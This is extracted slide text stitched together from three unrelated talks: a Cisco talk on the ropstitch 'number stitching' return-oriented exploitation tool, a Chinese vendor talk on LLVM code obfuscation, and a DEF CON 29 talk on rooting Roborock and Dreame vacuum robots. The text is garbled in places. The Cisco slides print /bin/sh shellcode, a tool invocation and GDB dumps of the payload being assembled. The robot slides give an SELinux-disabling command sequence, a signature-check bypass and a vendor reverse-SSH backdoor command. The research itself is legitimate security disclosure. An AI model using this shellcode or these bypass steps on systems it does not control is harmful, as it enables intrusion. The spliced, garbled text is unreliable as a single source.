© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Cut and order 4 byte shellcode chunks
! Add numbers found in memory together until you reach a chunk
! Once a chunk is reached, dump it to a stack frame
! Repeat until shellcode is complete
! Transfer control to shellcode
! Git it at https://github.com/alexmgr/numstitch
Summary
Cisco Con!dential
46
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! What it does:
! Takes an input shellcode, and a frame address
! Takes care of the tedious details (endianess, 2’s complement, padding, … )
! Spits out some python code to generate your payload
! Additional features:
! Add an mprotect RWE stub frame before your stack
! Start with an arbitrary accumulator register value
! Lookup numbers in section or segments
Introducing Ropstitch
Cisco Con!dential
47
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! The fake stack lives in a RW section
! You need to make that page RE
! Mprotect allows to change permissions at runtime
! The mprotect stub will change the permissions of the page to allow
shellcode execution
! Mprotect(page base address, page size (0x1000), RWE (0x7))
Why do you need an mprotect stub
Cisco Con!dential
48
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Generate a python payload:
! To copy a /bin/sh shellcode:
! To a fake frame frame located at 0x08049110 (.data section)
! Appending an mprotect frame (default behaviour)
! Looking up numbers in RO segment
! In binary abinary
Example usage
someone@something:~/somewhere$#ropstitch.py#Bx#"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a
\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd
\x80"#Bf#0x08049110#BS#Bs#.text#Bp#abinary#2>#/dev/null#
Cisco Con!dential
49
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! The tool will spit out some python code, where you need to add your
gadget addresses
! Then run that to get your payload
! Output is too verbose. See an example and further explanations on
numstitch_details.txt (Defcon CD) or here:
https://github.com/alexmgr/numstitch
Example tool output
Cisco Con!dential
50
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
GDB output
gdbBpeda$#x/16w#0x804a11c#
0x804a11c:
#0xb7f31e00
#0x00000000
#0x00000000
#0x00000000#
0x804a12c:
#0x00000007
#0x00000000
#0x00000000
#0x00000000#
0x804a13c:
#0x00000000
#0x00000000
#0x00000000
#0x00000000#
0x804a14c:
#0x00000000
#0x00000000
#0x00000000
#0x00000000#
gdbBpeda$###Writing#int#0x80.#Notice#that#the#numbers#are#added#in#increasing#order:#
0x804a11c:
#0xb7f31e00
#0x00000000
#0x00000000
#0x00000000#
0x804a12c:
#0x00000007
#0x00000000
#0x00000000
#0x00000000#
0x804a13c:
#0x00000000
#0x00000000
#0x00000000
#0x00000000#
0x804a14c:
#0x00000000
#0x00000080
#0x00000000
#0x00000000#
gdbBpeda$###Writing#mprotect#page#size#(0x1000).#Notice#that#the#numbers#are#added#in#increasing#order:#
0x804a11c:
#0xb7f31e00
#0x00000000
#0x00000000
#0x00001000#
0x804a12c:
#0x00000007
#0x00000000
#0x00000000
#0x00000000#
0x804a13c:
#0x00000000
#0x00000000
#0x00000000
#0x00000000#
0x804a14c:
#0x00000000
#0x00000080
#0x00000000
#0x00000000#
gdbBpeda$#c#10#
gdbBpeda$###later#execution#(notice#the#missing#parts#of#shellcode,#which#will#be#filed#in#later,#once#
eax#reaches#a#slice#value):#
0x804a11c:
#0xb7f31e00
#0x0804a130
#0x0804a000
#0x00001000#
0x804a12c:
#0x00000007
#0x00000000
#0x2d686652
#0x52e18970#
0x804a13c:
#0x2f68686a
#0x68736162
#0x6e69622f
#0x5152e389#
0x804a14c:
#0x00000000
#0x00000080
#0x00000000
#0x00000000#
gdbBpeda$###end#result#(The#shellcode#is#complete#in#memory):#
0x804a11c:
#0xb7f31e00
#0x0804a130
#0x0804a000
#0x00001000#
0x804a12c:
#0x00000007
#0x99580b6a
#0x2d686652
#0x52e18970#
0x804a13c:
#0x2f68686a
#0x68736162
#0x6e69622f
#0x5152e389#
0x804a14c:
#0xcde18953
#0x00000080
#0x00000000
#0x00000000#
Cisco Con!dential
51
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Pros and cons
Cisco Con!dential
52
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Pros:
! Can encode any shellcode (no null-byte problem)
! Lower 2 bytes can be controlled by excluding those values from the
addresses
! Not a$ected by RELRO, ASLR or X^W
! Cons:
! Payloads can be large, depending on the availability of number
! Thus requires a big stage-0, or a gadget table
Number stitching
Cisco Con!dential
53
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Further usage
Cisco Con!dential
54
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! What if the value of eax changes between runtimes?
! In stdcall convention, eax holds the return value of a function call
! Just call any function in the PLT
! There is a good chance you control the return value that way
Initialize eax
Cisco Con!dential
55
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Number stitching can also be used to load further gadgets instead of
a shellcode
! Concept of a gadget table
! Say you need:
! Pop ecx; ret;
=> 59 c3
! Pop ebx; ret;
=> 5b c3
! mov [ecx] ebx; ret;
=> 89 19 c3
! Your shellcode becomes: “\x59\xc3\x5b\xc3\x89\x19\xc3”
Shrink the size of the stage-0
Cisco Con!dential
56
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Number stitching can transfer those bytes to memory
! ropstitch can change the memory permissions with the mprotect
stub
! You can then just call the gadgets from the table as if they we’re part
of the binary
! You have the ability to load any gadget or byte in memory
! This is not yet automated in the tool
Gadget table
Cisco Con!dential
57
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Future work
Cisco Con!dential
58
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Search if there are numbers in memory not subject to ASLR:
! Check binaries with PIE enabled to see if anything comes up
! By de!nition, probably wont come up with anything, but who knows?
! Search for gadgets in new versions of libc/gcc. Seems di"cult, but
might yield a new approach
General
Cisco Con!dential
59
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Get dynamic programming approach to work with large numbers:
! Challenging
! 64 bit support. Easy, numbers are just bigger. Mprotect stack might
be harder because of the di$erent ABI
! Introduce a mixed approach:
! String copying for bytes available
! Number stitching for others
! Maybe contribute it to some rop tools (if they’re interested)
! Simplify the concept of gadget tables in the tool
Tooling
Cisco Con!dential
60
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Contact details
Cisco Con!dential
61
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! [email protected]
! https://github.com/alexmgr/numstitch
Alex Moneger
Thank you! | pdf |
刘柏江
几维安全创始人兼CTO
IoT时代LLVM编译器防护的艺术
目录
万物互联,代码安全先行
01
传统代码保护、LLVM安全编译器
02
03
混淆、块调度、代码虚拟化
万物互联,安全先行
物理安全
防止丢失或者被盗
业务安全
防止用户隐私数据泄漏
系统安全
防止底层漏洞被恶意利用
策略安全
万物互联,代码安全先行
防逆向
打配合
提高门槛
争取时间
防止核心算法被重构
提升策略安全的强度
提高破解成本,将逆向菜鸟拒之门外
加大破解难度,延长破解时间,为
运营争取更多的有利窗口期
物联网时代即将开启
Android Things
让您可以为各种消费者,
零售和工业应用程序构
建智能互联设备。
AliOS Things
面向IoT领域的轻量级物
联网嵌入式操作系统,
可广泛应用在智能家居、
智慧城市、新出行等领
域。
DuerOS
可以广泛支持手机、电
视、音箱、汽车、机器
人等多种硬件设备
IoT.MI
小米IoT开发者平台面向
智能家居、智能家电、
健康可穿戴、出行车载
等领域
芯片体系越来越多
互联网
Windows/MacOS/Linux
x86
x86-64
移动互联网
iOS/Android
x86
arm
arm64
物联网
Android/AliOS Things
x86
x86-64
arm
arm64
mips
mips64
stm32
avr
bpf
hexagon
lanai
nvptx
riscv
sparc
systemz
csky
运行内存越来越少
互联网
Windows/MacOS/Linux
256KB-1GB
移动互联网
iOS/Android
512MB-8GB
物联网
Android/AliOS Things
2GB-16GB
物联网操作系统运行环境
跑在种类繁多的芯片架构上
受限于功耗硬件性能低下
运行在内存一般偏小的环境
概念科普
黑盒代码加密
处理的对象是最终的软件执行体,比
如Windows的EXE、Android的SO
以及DEX
白盒代码加密
处 理 的 对 象 是 源 代 码 , 比 如
C/C++/Objective-C / Swif t
这 类 语 言 的 源 代 码 文 件
黑盒代码加密的应用
比 如 适 用 于 Windows 、
Linux、Android的UPX壳
比如利用x86指令集的可变
长特性增加误导反汇编程序
的垃圾指令
比 如 Windows 非 常 著 名 的
VMProtect
比如Android的DEX整体加
解密、类抽取
A
C
B
D
加壳
加花指令
加虚拟机
劫持
运行时
黑盒代码加密的局限
可移植性差
兼容性差
很难对多端且同源的代码做一致性的保护
芯片架构不兼容、内存需求显著增加,
很难适应新的像IoT这样的平台
对于像Android这类高碎片化的平台,干预
运行时意味着兼容性极差
对于像iOS这类完全封闭的平台,干预运行
时意味着方案没法工作
LLVM编译器登场
前端
源代码
LLVM是模块化、可复用的编译器工具链集合,最初是伊利诺伊大学的一个研究项目,
其目标是提供一种现代的,基于SSA的编译策略,能够支持任意编程语言的静态和动态
编译。
IR处理
LLVM-IR
后端
LLVM-MIR
目标文件
Object
LLVM-IR
函数
模块
IR指令
基本块
LLVM提供了完整的IR文件操作API,可以对IR文件的模块、函数、基本块、IR指令做任意修改。
||
架构信息
全局数据
函数申明
函数实现
编译元数据
||
函数申明
变量申明
代码块
||
IR指令序列
||
算术指令
逻辑指令
控制指令
......
挖掘LLVM-IR的潜能
架构无关
可以适应任意芯片架构
方案丰富
可以满足任意要求的安全级别
函数粒度
可以适应低内存运行环境
初级防护
原始流程图
混淆流程图
高级防护
原始流程图
块调度流程图
代码虚拟化KIWIVM
KiwiVM代码虚拟化编译器基于LLVM编译器中间层实现,通过设计独有保密的虚拟CPU指令,将原始CPU指令进行加
密转换为只能由KiwiVM解释执行的虚拟指令,能够完全隐藏函数代码逻辑,让代码无法被逆向工程。
虚拟CPU执行
函数保护粒度
全平台全架构
100%兼容性
KIWIVM转换过程
LLVM-BC
源文件
Clang
KiwiVM
源文件
KiwiVM的中心思想是利用LLVM-BC编码成自定义虚拟CPU的指令集和元数据,包括指令集数据、重定位数据、函数调用
签名数据等。
||
C
C++
ObjC
||
BC函数列表
||
功能等价的C
||
生成最终的
Obj文件
KIWIVM转换样例
旗舰防护
原始流程图
虚拟机流程图
差异对比
混淆
块调度
代码虚拟化
结束之前
几维安全编译器产品简介
级别
功能
平台
混淆编译器
初级
代码膨胀
乱序执行
iOS、Android、IoT
块调度编译器
高级
逻辑断链
函数调用隐藏
iOS、Android、IoT
虚拟化编译器
旗舰级
逻辑隐藏
虚拟CPU执行
iOS、Android、IoT
谢 谢! | pdf |
Robots with lasers and cameras (but no security):
Liberating your vacuum from the cloud
DEFCON 29 – Dennis Giese
(08.08.2021) DEFCON 29 – Dennis Giese
2
About me
• PhD student at Northeastern University, USA
– Working with Prof. Guevara Noubir @Khoury
– Research field: Wireless and embedded security&privacy
• Interests: Reverse engineering of interesting devices
– Smart Home Devices, mostly vacuum cleaning robots
– Current research: Smart Speakers
(08.08.2021) DEFCON 29 – Dennis Giese
3
Most recent work
• “Amazon Echo Dot or the reverberating secrets of IoT devices”
• Authors: Dennis Giese and Guevara Noubir
• Published: ACM WiSec 2021
https://dontvacuum.me/papers/ACMWisec-2021/
(08.08.2021) DEFCON 29 – Dennis Giese
4
Goals
• Get an overview over the development of vacuum robots
– Focus: Roborock and Dreame
• Learn about vulnerabilities and backdoors
• Understand methods to root current robots
https://www.dreame-technology.com/
https://www.roborock.com
Side note: Generally, a
friendly relationship with
vendors is maintained
(08.08.2021) DEFCON 29 – Dennis Giese
5
MOTIVATION
(08.08.2021) DEFCON 29 – Dennis Giese
6
Why do we want to root devices?
• Play with cool hardware
• Stop devices from constantly phoning home
• Use custom Smart Home Software
• Verification of privacy claims
(08.08.2021) DEFCON 29 – Dennis Giese
7
Why do we not trust IoT?
• Devices are connected to the home network
• Communication to the cloud is encrypted, content unclear
• Developing secure hardware and software is hard
• Vendor claims contradict each other
(08.08.2021) DEFCON 29 – Dennis Giese
8
“Nothing is sent to the cloud”?
https://global.roborock.com/pages/roborock-s6-maxv
(08.08.2021) DEFCON 29 – Dennis Giese
9
… but you can access the camera?
https://global.roborock.com/pages/roborock-s6-maxv
(08.08.2021) DEFCON 29 – Dennis Giese
10
Problem of used devices
• Used devices might be problematic
– Previous owner installed rootkit
– New owner cannot verify software
– Result: Device might behave maliciously in your network
• Rooting is the only way to verify that a device is „clean“
(08.08.2021) DEFCON 29 – Dennis Giese
11
A LOOK IN THE PAST:
THE GOOD OLD TIMES
(08.08.2021) DEFCON 29 – Dennis Giese
12
First work in 2017
•
Work together with Daniel Wegemer
•
Xiaomi Vacuum Robot / Roborock S5
•
Findings:
– Firmware images: unsigned and encrypted with weak key
– Custom firmware could be pushed from local network
•
Result:
– Rooting without disassembly
– Development of custom Software and Voice packages
•
Publication: 34C3 (2017) and DEF CON 26 (2018)
rockrobo.vacuum.v1 (End of 2016), roborock.vacuum.s5 (End of 2017)
https://dontvacuum.me/talks/DEFCON26/DEFCON26-Having_fun_with_IoT-Xiaomi.html
(08.08.2021) DEFCON 29 – Dennis Giese
13
Recap Hardware V1 / S5
•
Quadcore ARM
•
512 Mbyte RAM
•
4 GByte eMMC Flash
•
Sensors:
– LiDAR
– IR
– Ultrasonic
•
Debug ports:
– USB
– UART
512 MB RAM
Quadcore
SOC
4GB
eMMC
Flash
WiFi Module
STM32 MCU
(08.08.2021) DEFCON 29 – Dennis Giese
14
Recap Software V1 / S5
•
Ubuntu 14.04.3 LTS (Kernel 3.4.xxx)
–
Mostly untouched
–
Obfuscated “root” password
•
Player 3.10-svn
–
Open-Source Cross-platform robot device interface & server
•
Proprietary software (/opt/rockrobo)
–
Custom adbd-version
–
Watchdog (enforces copy protection)
–
Logging tool (uploading a lot of data to the cloud)
•
iptables firewall enabled (IPv4!)
–
Blocks Port 22 (SSHd) + Port 6665 (player)
–
Fail: IPv6 not blocked at all
(08.08.2021) DEFCON 29 – Dennis Giese
15
THE FORCE STRIKES BACK:
LOCKING DOWN THE DEVICES
(08.08.2021) DEFCON 29 – Dennis Giese
16
First steps in locking down
• Newer Roborock S5 firmware: local updates blocked
• With introduction of Roborock S6 (2019):
– Signed firmware and voice packages
– Each model uses different encryption keys
– Signed configuration files to enforce region locks
– However: Hardware remains mostly the same
• Disassembly of devices was required
(08.08.2021) DEFCON 29 – Dennis Giese
17
Keeping rooting methods secret
• Roborock S6 rooted in the first 2 weeks after release
• Developed methods:
– Extraction of obfuscated root password via UART
– Single user boot via U-Boot
• Methods were not published for some time
• Assumption: Roborock would lock them down in newer
devices
(08.08.2021) DEFCON 29 – Dennis Giese
18
Getting access via UART
(08.08.2021) DEFCON 29 – Dennis Giese
19
Observations
• Every time we publish a method, it gets blocked
• Examples for blocking:
– Local updates (2017):
• Blocked via firmware updates in 2018
– Root password method (2019):
• Blocked for newly produced devices in 2019
– U-Boot bypass (2020):
• Blocked for new models in 2020
All currently public
methods are blocked ☹
(08.08.2021) DEFCON 29 – Dennis Giese
20
DEVELOPMENT OF ROBOROCK MODELS
(08.08.2021) DEFCON 29 – Dennis Giese
21
Roborock device development
2016
2017
2019
2020
2021
2018
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Xiaomi
V1
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
(08.08.2021) DEFCON 29 – Dennis Giese
22
Roborock device development
2016
2017
2019
2021
2018
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
USD 380
2020
USD 280
USD 250
USD 550
USD 430
USD 430
USD 200
USD 700
USD 650
USD 230
(08.08.2021) DEFCON 29 – Dennis Giese
23
Roborock device development
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Images: Xiaomi
Roborock
S6 Pure
USD 380
Roborock
S5
USD 280
Roborock
S4
USD 250
Roborock
S5 Max
USD 550
Roborock
S4 Max
USD 430
Roborock
S6
USD 430
USD 200
Roborock
S6 MaxV
USD 700
Roborock
S7
USD 650
Xiaomi
M1S
USD 230
$$$
(08.08.2021) DEFCON 29 – Dennis Giese
24
Roborock device development
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Images: Xiaomi
Roborock
S6 Pure
USD 380
Roborock
S5
USD 280
Roborock
S4
USD 250
Roborock
S5 Max
USD 550
Roborock
S4 Max
USD 430
Roborock
S6
USD 430
USD 200
Roborock
S6 MaxV
USD 700
Roborock
S7
USD 650
Xiaomi
M1S
USD 230
$$$
(08.08.2021) DEFCON 29 – Dennis Giese
25
Roborock device development
2016
2017
2019
2020
2021
2018
Xiaomi
V1
512
MB
RAM
256
MB
RAM
>= 4
GB
Flash
<= 512
Mbyte
Flash
1GB
RAM
Contains only global models
Roborock
S5
Roborock
S6
Xiaomi
M1S
Roborock
S6 Pure
Roborock
S6 MaxV
Roborock
S7
Roborock
S4 Max
Roborock
S4
Roborock
S5 Max
Images: Xiaomi
Hardware gets weaker,
despite devices getting more
expensive
Conclusion
(08.08.2021) DEFCON 29 – Dennis Giese
26
ROBOROCK CAMERA ROBOTS
(08.08.2021) DEFCON 29 – Dennis Giese
27
Xiaomi M1S
•
Released Q2/2019
•
SoC: Rockchip RK3326 (64-Bit ARM Quadcore)
•
RAM: 512 Mbyte
•
Flash: 4GByte eMMC
•
Sensors:
– LiDAR
– Up-facing B/W Camera
– Ultrasonic distance sensor
– IR sensors
Find more teardown pictures here:
https://dontvacuum.me/teardowns/roborock.vacuum.m1s/
(08.08.2021) DEFCON 29 – Dennis Giese
28
Video perspective of M1S robot
Recorded with GStreamer on robot (/dev/video1)
(08.08.2021) DEFCON 29 – Dennis Giese
29
Roborock S6 MaxV Hardware
•
Released Q2/2020
•
SoC: Qualcomm APQ8053 (64-Bit ARM Octocore)
•
RAM: 1 GByte
•
Flash: 4GByte eMMC
•
Sensors:
– LiDAR
– 2x FullHD color front cameras (with IR)
– IR sensors
•
Water Tank + Pump
Find more teardown pictures here:
https://dontvacuum.me/teardowns/roborock.vacuum.a10/
SoC
eMCP
(08.08.2021) DEFCON 29 – Dennis Giese
30
Roborock S6 MaxV Cameras
Stereo Camera
Infrared
Illumination
Screenshots from the Roborock app
(08.08.2021) DEFCON 29 – Dennis Giese
31
Xiaomi M1S/Roborock S6 MaxV Software
• OS: Android
• Similar software as previous models
• Cameras can be accessed via video4linux subsystem
• Used libraries
– OpenCV
– OpenCL
– Tensorflow Lite
(08.08.2021) DEFCON 29 – Dennis Giese
32
Security measures
• Secure boot
– Replay-Protected-Memory-Block (RPMB) enabled
• DM-Verity
– System partition integrity protected
• SELinux enabled and enforced
• LUKS encrypted partitions
– All application specific programs protected
– Keys stored in OPTEE / ARM TrustZone
(08.08.2021) DEFCON 29 – Dennis Giese
33
Security measures
• Signed ELF-Binaries and kernel-based
verification
• Signed and encrypted Firmware updates
– Keys different per firmware version
– Master keys stored in OPTEE / TrustZone
• IPtables binary cannot flush/delete rules
• Locked UART
(08.08.2021) DEFCON 29 – Dennis Giese
34
Interesting partitions
Label
Content
Mountpoint
LUKS
DM-verity
app
device.conf (DID, key, MAC), adb.conf, vinda
/mnt/default/
✗
✗
system_a
copy of OS (active by default)
/
✗
✓
system_b
copy of OS (passive by default)
✗
✓
app_a
Robot application and libraries (active)
/opt
✓
✗
app_b
Robot application and libraries (passive)
✓
✗
reserve
config + calibration files
/mnt/reserve/
✓
✗
rtmpdata
logs, maps
/mnt/data
✓
✗
(08.08.2021) DEFCON 29 – Dennis Giese
35
NEW ROOTING METHODS (ROBOROCK)
(08.08.2021) DEFCON 29 – Dennis Giese
36
Unrooted robots
• Roborock S7
• Xiaomi M1S
• Roborock S6 MaxV
(08.08.2021) DEFCON 29 – Dennis Giese
37
Unrooted robots
➢ Roborock S7
• Xiaomi M1S
• Roborock S6 MaxV
(08.08.2021) DEFCON 29 – Dennis Giese
38
Roborock S7 rooting
•
Same mainboard as S5 Max, S6 Pure, etc.
•
Problems:
– U-Boot patched --> UART method does not work
– RootFS is a read-only SquashFS
•
New Method: FEL rooting
– Does not require soldering
– Does require disassembly
– Automatically patches RootFS and enables SSH
– Applies to all current NAND-based Roborock models
(08.08.2021) DEFCON 29 – Dennis Giese
39
PCB reverse engineering
Old Method:
UART
•
UART pins were known before
– Useless after blocking
•
Allwinner SOCs have FEL mode
– Low level mode
– Allows flashing of device
– Burned in SOC ROM
•
Idea: boot custom OS via FEL
•
Typical methods to trigger FEL:
– Disable Flash IC
– Pull BOOT Mode / FEL pin
https://linux-sunxi.org/FEL
(08.08.2021) DEFCON 29 – Dennis Giese
40
PCB reverse engineering
New Method:
FEL
SOC
Destructive
Desoldering
Probing
(08.08.2021) DEFCON 29 – Dennis Giese
41
Booting via FEL
•
Challenge: NAND support proprietary
•
Approach:
– Extract kernel config from Rockrobo kernel
– Create InitramFS with Dropbear, SSH keys and tools
– Compile minimal Kernel using public Nintendo NES Classic sources
– Create custom U-Boot version with extracted Roborock config
– Trigger FEL Mode by shorting TPA17 to GND
– Load U-Boot, Kernel and InitramFS into RAM via USB
– Boot and automatically patch the SquashFS RootFS
https://www.nintendo.co.jp/support/oss/data/SuperNESClassicEdition_OSS.zip
https://builder.dontvacuum.me/fel-ressources
(08.08.2021) DEFCON 29 – Dennis Giese
42
FEL image patching process
•
Boot into FEL image
•
Decompress SquashFS
•
Patch RootFS image
– Install “authorized_keys” and custom Dropbear SSH server
•
Compress SquashFS image
•
Overwrite partition with new image
•
Result: SSH access and root
https://builder.dontvacuum.me/fel-ressources
https://builder.dontvacuum.me/howtos
(08.08.2021) DEFCON 29 – Dennis Giese
43
FEL rooting advantages
•
No soldering required
•
Simple process
•
Allows to restore bricked devices
•
Can be used for all Allwinner-based devices
https://builder.dontvacuum.me/fel-ressources
(08.08.2021) DEFCON 29 – Dennis Giese
44
Unrooted robots
✓ Roborock S7
➢ Xiaomi M1S
➢ Roborock S6 MaxV
(08.08.2021) DEFCON 29 – Dennis Giese
45
Xiaomi M1S / S6 MaxV rooting
•
Problems:
– All ports closed or firewalled
– Filesystems encrypted or integrity protected
– USB interface protected with custom adbd
•
Idea: layered approach
– Break in via USB
– Disable SELinux
– Patch application partition
•
Note: While its possible, it might be impossible for many people ☹
(08.08.2021) DEFCON 29 – Dennis Giese
46
Level 1: Get ADB shell
•
ADB uses special authentication
– Challenge-Response authentication
– Based on VINDA secret (which we don’t have)
– Mode controlled by config file (adb.conf)
– Relevant files stored on “default” partition and not protected
•
Idea:
– Connect to Flash via ISP or de-solder it
– Extract or create VINDA secret
– Use tool to compute challenge response
https://builder.dontvacuum.me/vinda
(08.08.2021) DEFCON 29 – Dennis Giese
47
ISP access Xiaomi M1S
(08.08.2021) DEFCON 29 – Dennis Giese
48
ISP access Roborock S6 MaxV
D5
D0
D2
D3
D7
D1
D4
CMD
D6
CAUTION: If you don‘t know what
you‘re doing, you‘re likely to brick
your device
(08.08.2021) DEFCON 29 – Dennis Giese
49
Recommended Method
•
ISP access can be tricky
•
Usage of an adapter might be easier
– Requires reflow soldering
– Re-balling equipment needed
(08.08.2021) DEFCON 29 – Dennis Giese
50
Level 1 result
•
We set vinda to “UUUUUUUUUUUUUUUU”
1. Get serial number
2. Get challenge
3. Compute response using
serial number and challenge
4. Execute commands
Many thanks to Erik Uhlmann for his support
https://builder.dontvacuum.me/vinda
(08.08.2021) DEFCON 29 – Dennis Giese
51
Level 2: Disable SELinux
•
We have shell access, but SELinux is enforced
– Network access is blocked
– Access to /dev is blocked
– However: bind-mounts and “kill” is allowed
•
Idea:
– Copy /opt/rockrobo/miio to /tmp/miio
– Replace “miio_client” with bash script
– Bind-mount /tmp/miio to /opt/rockrobo/miio
– Kill “miio_client” -> bash script gets executed
(08.08.2021) DEFCON 29 – Dennis Giese
52
Level 2 result
• Watchdog will restart miio_client if it gets killed
# getenforce
Enforcing
# ps
PID USER TIME COMMAND
…
9751 root 26:04 miio_client -d /mnt/data/miio -l 2
….
# cp -r /opt/rockrobo/miio /tmp/
# echo '#!/bin/sh' > /tmp/miio/miio_client
# echo 'echo 0 > /sys/fs/selinux/enforce' >> /tmp/miio/miio_client
# echo 'sleep 30' >> /tmp/miio/miio_client
# mount -o bind /tmp/miio /opt/rockrobo/miio
# kill 9751
# getenforce
Permissive
1. Get the current mode of SELinux
2. Find PID of miio_client process
3. Copy miio directory to /tmp
4. Create bash script in place if miio_client
to disable SELinux
5. Bind-mount modified directory to /opt/
rockrobo/miio
6. Kill miio_client process
7. Enjoy
(08.08.2021) DEFCON 29 – Dennis Giese
53
Level 3: Modify application partition
• We have now full root, but only temporary
– “app” partition not integrity protected
– By modification of scripts
• disable SELinux
• start Dropbear on a different port
– Limitation: ELF binaries need to be signed
• “Backdoor”: any file named “librrafm.so” is whitelisted
• Symbolic links work ;)
Many thanks to Erik Uhlmann for his support
(08.08.2021) DEFCON 29 – Dennis Giese
54
Level 3 result
• We want to run Valetudo on our robot
/tmp # wget https://github.com/Hypfer/Valetudo/.../valetudo-armv7
/tmp # ./valetudo-armv7
Segmentation fault
/tmp # dmesg
....
[1744981.268689] __verify_elf__: (valetudo-armv7)sign verify fail, target section non exist!
[1744981.268722] [verify_elf]:(valetudo-armv7)signature verify fail!
/tmp # mv valetudo-armv7 librrafm.so
/tmp # ./librrafm.so
[2021-06-30T03:24:39.664Z] [INFO] Autodetected RoborockS6MaxVValetudoRobot
[2021-06-30T03:24:39.736Z] [INFO] Starting Valetudo 2021.06.0
[2021-06-30T03:24:39.742Z] [INFO] Configuration file: /tmp/valetudo_config.json
[2021-06-30T03:24:39.743Z] [INFO] Logfile: /tmp/valetudo.log
[2021-06-30T03:24:39.744Z] [INFO] Robot: Beijing Roborock Technology Co., Ltd. S6 MaxV
1. Download
Valetudo
2. Realize it doesn’t
work because of
custom ELF
signature
3. Rename Valetudo
to ”librrafm.so”
4. Enjoy working
Valetudo
(08.08.2021) DEFCON 29 – Dennis Giese
55
Other ideas for M1S / S6 MaxV
• Ask OPTEE nicely to decrypt firmware updates
• Access cameras directly (via GStreamer)
• Extract Machine Learning Models
• Find all the backdoors
(08.08.2021) DEFCON 29 – Dennis Giese
56
Summary Roborock
• We have an easy method to root S7 and other models
• We have root for Xiaomi M1S and Roborock S6 MaxV
– However: Method is dangerous and will brick your device
– Only feasible if you have equipment and experience
– Regard rooting only as a proof-of-concept
• Recommendation:
– avoid new Roborock models if you want root
(08.08.2021) DEFCON 29 – Dennis Giese
57
A NEW PLAYER: DREAME
(08.08.2021) DEFCON 29 – Dennis Giese
58
A new alternative
•
First model released in 2019
•
OEM products for Xiaomi
•
Models:
– Xiaomi 1C and Dreame F9 (VSLAM)
– Dreame D9 (LiDAR)
– Xiaomi 1T (VSLAM + ToF)
– Dreame L10 Pro (LiDAR + Line Laser + Camera)
•
Allwinner SoC
•
OS based on Android
•
Robot software: AVA
Pictures of Xiaomi 1T (top), Dreame D9 (bottom)
https://dontvacuum.me/robotinfo/
(08.08.2021) DEFCON 29 – Dennis Giese
59
Video perspective Xiaomi 1C/Dreame F9
Recorded with camera_demo and AVA recording commands
(08.08.2021) DEFCON 29 – Dennis Giese
60
Time-of-Flight Camera Xiaomi 1T
Point cloud obtained by AVA commands
(08.08.2021) DEFCON 29 – Dennis Giese
61
Line Laser Dreame L10 Pro
Recorded with activated line laser from /dev/video1
(08.08.2021) DEFCON 29 – Dennis Giese
62
ROOTING DREAME
(08.08.2021) DEFCON 29 – Dennis Giese
63
Easy opening and root
•
First root: December 2019 (1C)
•
All models have the same connector
– Can be accessed without breaking warranty seals
•
Extracted key material and firmware
•
Reverse engineered flashing via FEL
– Usage of Banana Pi tools
– Flashing with PhoenixUSB (Windows only ☹)
https://github.com/BPI-SINOVOIP/BPI-M3-bsp
(08.08.2021) DEFCON 29 – Dennis Giese
64
Debug pinout
Front
Boot_SEL
RX
TX
D+
D-
VBUS
(Do not
connect)
GND
•
Debuginterface
–
2x8 pins
–
2mm pitch size
Warning:
2mm pitch size is way smaller
than the usual 2.54 mm
Warning:
Make sure you connect to the
correct pins!
(08.08.2021) DEFCON 29 – Dennis Giese
65
Rooting with custom PCBs
For the Gerber files (thanks to Ben Helfrich):
https://builder.dontvacuum.me/dreameadapter
(08.08.2021) DEFCON 29 – Dennis Giese
66
Examples of connections
USB
UART
Marker
(needs to be on the right)
BOOT_S
EL
Front
For the Gerber files (thanks to Ben Helfrich):
https://builder.dontvacuum.me/dreameadapter
(08.08.2021) DEFCON 29 – Dennis Giese
67
INTERESTING FINDINGS
(08.08.2021) DEFCON 29 – Dennis Giese
68
AutoSSH backdoor
• Trigger reverse SSH shell
–
sshpass -p xxx ssh -p 10022 -o StrictHostKeyChecking=no -fCNR last-4-digits-of-sn:127.0.0.1:22
[email protected]
• Hard coded credentials to server
– User has sudo rights
– Server used for development
(08.08.2021) DEFCON 29 – Dennis Giese
69
Debug Scripts
•
Startup debug script
– Unencrypted ftp download from personal developer NAS
•
Log uploads
– With admin credentials
(08.08.2021) DEFCON 29 – Dennis Giese
70
Obfuscated Root Password
• Root password of device is derived as follows:
– Base64(SHA1(Serial number))
• Password for debug firmwares (globally):
– #share!#
(08.08.2021) DEFCON 29 – Dennis Giese
71
Lots of “chatty” functions
• Debug functions
– Recording and upload of pictures
– Recording and upload of camera recordings
• Device produces lots of log-files
